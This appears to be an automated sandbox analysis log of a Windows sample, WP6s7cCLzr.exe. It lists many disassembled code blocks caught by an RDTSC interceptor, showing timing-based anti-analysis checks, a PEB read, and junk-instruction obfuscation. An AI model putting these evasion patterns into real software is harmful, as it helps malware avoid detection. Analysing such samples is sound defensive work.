Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 14BA149 second address: 14BA16A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jp 00007F474CE395FEh 0x0000000b pushad 0x0000000c popad 0x0000000d je 00007F474CE395F6h 0x00000013 jl 00007F474CE39602h 0x00000019 jbe 00007F474CE395F6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 14BA16A second address: 14BA188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 jmp 00007F474D527175h 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A000E second address: 77A0032 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F474CE39601h 0x00000008 mov ah, CBh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov bl, DCh 0x00000013 mov ax, F66Dh 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A0032 second address: 77A0063 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474D527173h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d call 00007F474D527174h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A0063 second address: 77A0157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 mov esi, 5739A303h 0x0000000b pop esi 0x0000000c popad 0x0000000d mov ebp, esp 0x0000000f pushad 0x00000010 jmp 00007F474CE39605h 0x00000015 call 00007F474CE39600h 0x0000001a movzx esi, bx 0x0000001d pop ebx 0x0000001e popad 0x0000001f mov eax, dword ptr fs:[00000030h] 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F474CE39608h 0x0000002c adc ax, 2658h 0x00000031 jmp 00007F474CE395FBh 0x00000036 popfd 0x00000037 pushfd 0x00000038 jmp 00007F474CE39608h 0x0000003d adc cl, FFFFFFB8h 0x00000040 jmp 00007F474CE395FBh 0x00000045 popfd 0x00000046 popad 0x00000047 sub esp, 18h 0x0000004a jmp 00007F474CE39606h 0x0000004f xchg eax, ebx 0x00000050 pushad 0x00000051 mov ebx, esi 0x00000053 call 00007F474CE395FAh 0x00000058 pushfd 0x00000059 jmp 00007F474CE39602h 0x0000005e and ah, 00000078h 0x00000061 jmp 00007F474CE395FBh 0x00000066 popfd 0x00000067 pop ecx 0x00000068 popad 0x00000069 push eax 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e jmp 00007F474CE39600h 0x00000073 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A0157 second address: 77A015D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A015D second address: 77A0163 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A0163 second address: 77A0167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A0167 second address: 77A016B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A016B second address: 77A0198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 jmp 00007F474D527174h 0x0000000e mov ebx, dword ptr [eax+10h] 0x00000011 pushad 0x00000012 mov ax, 6A49h 0x00000016 popad 0x00000017 xchg eax, esi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A0198 second address: 77A019C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A019C second address: 77A01AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474D52716Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A01AD second address: 77A01F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 movsx edi, cx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e mov esi, edi 0x00000010 mov bx, B212h 0x00000014 popad 0x00000015 xchg eax, esi 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushfd 0x0000001a jmp 00007F474CE39605h 0x0000001f sbb cx, 9CE6h 0x00000024 jmp 00007F474CE39601h 0x00000029 popfd 0x0000002a rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A01F3 second address: 77A025F instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F474D527170h 0x00000008 or cx, 2888h 0x0000000d jmp 00007F474D52716Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov dl, ch 0x00000017 popad 0x00000018 mov esi, dword ptr [775606ECh] 0x0000001e jmp 00007F474D52716Bh 0x00000023 test esi, esi 0x00000025 jmp 00007F474D527176h 0x0000002a jne 00007F474D5280C6h 0x00000030 jmp 00007F474D527170h 0x00000035 xchg eax, edi 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A025F second address: 77A02F3 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F474CE39603h 0x00000008 xor cx, EF8Eh 0x0000000d jmp 00007F474CE39609h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007F474CE39600h 0x0000001b jmp 00007F474CE39605h 0x00000020 popfd 0x00000021 popad 0x00000022 push eax 0x00000023 jmp 00007F474CE39601h 0x00000028 xchg eax, edi 0x00000029 jmp 00007F474CE395FEh 0x0000002e call dword ptr [77530B60h] 0x00000034 mov eax, 756AE5E0h 0x00000039 ret 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F474CE395FAh 0x00000043 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A02F3 second address: 77A0302 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474D52716Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A046C second address: 77A0470 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A0470 second address: 77A04AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov edx, 3E66EE1Eh 0x0000000b popad 0x0000000c je 00007F47BD266392h 0x00000012 jmp 00007F474D527175h 0x00000017 sub eax, eax 0x00000019 pushad 0x0000001a mov cl, dl 0x0000001c mov ebx, ecx 0x0000001e popad 0x0000001f mov dword ptr [esi], edi 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov eax, edx 0x00000026 mov bx, AD5Ch 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A04AB second address: 77A04F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474CE39602h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c pushad 0x0000000d call 00007F474CE395FEh 0x00000012 movzx eax, dx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushfd 0x00000019 jmp 00007F474CE395FAh 0x0000001e or ecx, 686728D8h 0x00000024 jmp 00007F474CE395FBh 0x00000029 popfd 0x0000002a rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A04F6 second address: 77A05AE instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F474D527178h 0x00000008 or ax, F338h 0x0000000d jmp 00007F474D52716Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov dword ptr [esi+08h], eax 0x00000019 pushad 0x0000001a mov edx, ecx 0x0000001c pushfd 0x0000001d jmp 00007F474D527170h 0x00000022 and ax, 6D98h 0x00000027 jmp 00007F474D52716Bh 0x0000002c popfd 0x0000002d popad 0x0000002e mov dword ptr [esi+0Ch], eax 0x00000031 pushad 0x00000032 push eax 0x00000033 mov ebx, 2C140486h 0x00000038 pop edx 0x00000039 pushfd 0x0000003a jmp 00007F474D52716Ch 0x0000003f sbb si, 97F8h 0x00000044 jmp 00007F474D52716Bh 0x00000049 popfd 0x0000004a popad 0x0000004b mov eax, dword ptr [ebx+4Ch] 0x0000004e pushad 0x0000004f mov eax, 16FBB94Bh 0x00000054 jmp 00007F474D527170h 0x00000059 popad 0x0000005a mov dword ptr [esi+10h], eax 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007F474D527177h 0x00000064 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A05AE second address: 77A064C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474CE39609h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+50h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F474CE395FCh 0x00000013 sbb eax, 2AA23718h 0x00000019 jmp 00007F474CE395FBh 0x0000001e popfd 0x0000001f call 00007F474CE39608h 0x00000024 push ecx 0x00000025 pop ebx 0x00000026 pop ecx 0x00000027 popad 0x00000028 mov dword ptr [esi+14h], eax 0x0000002b jmp 00007F474CE395FDh 0x00000030 mov eax, dword ptr [ebx+54h] 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007F474CE395FCh 0x0000003a sub ax, BBD8h 0x0000003f jmp 00007F474CE395FBh 0x00000044 popfd 0x00000045 push eax 0x00000046 mov dl, 5Ah 0x00000048 pop eax 0x00000049 popad 0x0000004a mov dword ptr [esi+18h], eax 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 mov ah, 8Dh 0x00000052 mov ah, bh 0x00000054 popad 0x00000055 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A064C second address: 77A0670 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474D527177h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+58h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A0670 second address: 77A068B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474CE39607h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A068B second address: 77A06CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F474D527175h 0x0000000b or eax, 5ED8C8E6h 0x00000011 jmp 00007F474D527171h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esi+1Ch], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push ebx 0x00000021 pop esi 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A06CC second address: 77A071A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 23976C07h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [ebx+5Ch] 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F474CE39606h 0x00000017 adc ch, FFFFFFE8h 0x0000001a jmp 00007F474CE395FBh 0x0000001f popfd 0x00000020 movzx ecx, di 0x00000023 popad 0x00000024 mov dword ptr [esi+20h], eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F474CE395FEh 0x0000002e rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A071A second address: 77A0720 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A0720 second address: 77A0724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A0724 second address: 77A0728 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A0728 second address: 77A079B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+60h] 0x0000000b jmp 00007F474CE39609h 0x00000010 mov dword ptr [esi+24h], eax 0x00000013 pushad 0x00000014 jmp 00007F474CE395FCh 0x00000019 pushad 0x0000001a jmp 00007F474CE39607h 0x0000001f popad 0x00000020 popad 0x00000021 mov eax, dword ptr [ebx+64h] 0x00000024 pushad 0x00000025 movzx ecx, di 0x00000028 mov eax, ebx 0x0000002a popad 0x0000002b mov dword ptr [esi+28h], eax 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F474CE39606h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A079B second address: 77A07D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474D52716Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+68h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov bh, 1Ah 0x00000011 pushfd 0x00000012 jmp 00007F474D52716Ch 0x00000017 sbb ax, BDF8h 0x0000001c jmp 00007F474D52716Bh 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A07D1 second address: 77A0800 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474CE39609h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+2Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F474CE395FDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A0800 second address: 77A0806 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A0806 second address: 77A080A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A080A second address: 77A083B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474D527173h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ax, word ptr [ebx+6Ch] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F474D527170h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A083B second address: 77A083F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A083F second address: 77A0845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A0845 second address: 77A0861 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474CE395FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [esi+30h], ax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A0861 second address: 77A087E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474D527179h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A087E second address: 77A08AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F474CE39607h 0x00000008 mov ax, 808Fh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ax, word ptr [ebx+00000088h] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A08AC second address: 77A08B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A08B0 second address: 77A08C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474CE39603h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A08C7 second address: 77A0941 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474D527179h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [esi+32h], ax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F474D527173h 0x00000016 or cx, 5F5Eh 0x0000001b jmp 00007F474D527179h 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007F474D527170h 0x00000027 or si, 2B58h 0x0000002c jmp 00007F474D52716Bh 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A0941 second address: 77A0A0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 pushfd 0x00000007 jmp 00007F474CE395FBh 0x0000000c add cl, 0000001Eh 0x0000000f jmp 00007F474CE39609h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov eax, dword ptr [ebx+0000008Ch] 0x0000001e jmp 00007F474CE395FEh 0x00000023 mov dword ptr [esi+34h], eax 0x00000026 jmp 00007F474CE39600h 0x0000002b mov eax, dword ptr [ebx+18h] 0x0000002e jmp 00007F474CE39600h 0x00000033 mov dword ptr [esi+38h], eax 0x00000036 pushad 0x00000037 mov bx, cx 0x0000003a pushfd 0x0000003b jmp 00007F474CE395FAh 0x00000040 sbb cl, FFFFFFA8h 0x00000043 jmp 00007F474CE395FBh 0x00000048 popfd 0x00000049 popad 0x0000004a mov eax, dword ptr [ebx+1Ch] 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 mov ecx, edx 0x00000052 pushfd 0x00000053 jmp 00007F474CE39607h 0x00000058 and si, 4F9Eh 0x0000005d jmp 00007F474CE39609h 0x00000062 popfd 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A0A0F second address: 77A0A1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F474D52716Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A0A1F second address: 77A0A23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A0A23 second address: 77A0A34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+3Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A0A34 second address: 77A0A4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474CE39604h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A0A4C second address: 77A0ABD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474D52716Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+20h] 0x0000000c jmp 00007F474D527176h 0x00000011 mov dword ptr [esi+40h], eax 0x00000014 pushad 0x00000015 mov cx, B1EDh 0x00000019 pushfd 0x0000001a jmp 00007F474D52716Ah 0x0000001f add ax, 6D88h 0x00000024 jmp 00007F474D52716Bh 0x00000029 popfd 0x0000002a popad 0x0000002b lea eax, dword ptr [ebx+00000080h] 0x00000031 jmp 00007F474D527176h 0x00000036 push 00000001h 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A0ABD second address: 77A0ADA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474CE39609h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A0ADA second address: 77A0AF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F474D527177h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A0AF6 second address: 77A0B3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pop ecx 0x0000000c pop ebx 0x0000000d pushfd 0x0000000e jmp 00007F474CE395FAh 0x00000013 sub eax, 544F07D8h 0x00000019 jmp 00007F474CE395FBh 0x0000001e popfd 0x0000001f popad 0x00000020 push eax 0x00000021 pushad 0x00000022 mov edi, 0E0CC6FAh 0x00000027 popad 0x00000028 nop 0x00000029 jmp 00007F474CE395FCh 0x0000002e lea eax, dword ptr [ebp-10h] 0x00000031 pushad 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A0B3D second address: 77A0B65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 mov ecx, 4D23106Fh 0x0000000c popad 0x0000000d nop 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push edi 0x00000012 pop esi 0x00000013 call 00007F474D527173h 0x00000018 pop esi 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A0B65 second address: 77A0B90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474CE39606h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F474CE395FEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A0CA0 second address: 77A0CB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474D527171h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A0CB5 second address: 77A0D01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 16C2h 0x00000007 pushfd 0x00000008 jmp 00007F474CE39603h 0x0000000d and ah, FFFFFFBEh 0x00000010 jmp 00007F474CE39609h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push 00000001h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F474CE395FDh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A0DD2 second address: 77A0E50 instructions: 0x00000000 rdtsc 0x00000002 mov edi, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov esi, 4CCEE22Fh 0x0000000b popad 0x0000000c test edi, edi 0x0000000e pushad 0x0000000f call 00007F474D527170h 0x00000014 jmp 00007F474D527172h 0x00000019 pop eax 0x0000001a pushfd 0x0000001b jmp 00007F474D52716Bh 0x00000020 or eax, 765A461Eh 0x00000026 jmp 00007F474D527179h 0x0000002b popfd 0x0000002c popad 0x0000002d js 00007F47BD2659EEh 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 jmp 00007F474D527173h 0x0000003b push esi 0x0000003c pop edx 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A0E50 second address: 77A0ECF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F474CE395FBh 0x00000008 pushfd 0x00000009 jmp 00007F474CE39608h 0x0000000e sub ah, FFFFFFA8h 0x00000011 jmp 00007F474CE395FBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [ebp-04h] 0x0000001d jmp 00007F474CE39606h 0x00000022 mov dword ptr [esi+08h], eax 0x00000025 jmp 00007F474CE39600h 0x0000002a lea eax, dword ptr [ebx+70h] 0x0000002d jmp 00007F474CE39600h 0x00000032 push 00000001h 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A0ECF second address: 77A0ED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 77A0ED3 second address: 77A0F49 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F474CE395FAh 0x00000008 adc ecx, 04D20598h 0x0000000e jmp 00007F474CE395FBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 mov edx, 48CC0EBAh 0x0000001c pop edi 0x0000001d popad 0x0000001e nop 0x0000001f pushad 0x00000020 mov edx, esi 0x00000022 popad 0x00000023 push eax 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F474CE395FBh 0x0000002b add al, 0000000Eh 0x0000002e jmp 00007F474CE39609h 0x00000033 popfd 0x00000034 movzx esi, dx 0x00000037 popad 0x00000038 nop 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F474CE39606h 0x00000040 rdtsc
